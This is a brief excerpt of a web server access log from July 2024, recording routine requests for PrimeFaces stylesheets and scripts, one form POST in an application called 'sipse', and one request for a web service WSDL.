181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36803
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [12/Jul/2024:00:14:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [12/Jul/2024:00:14:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
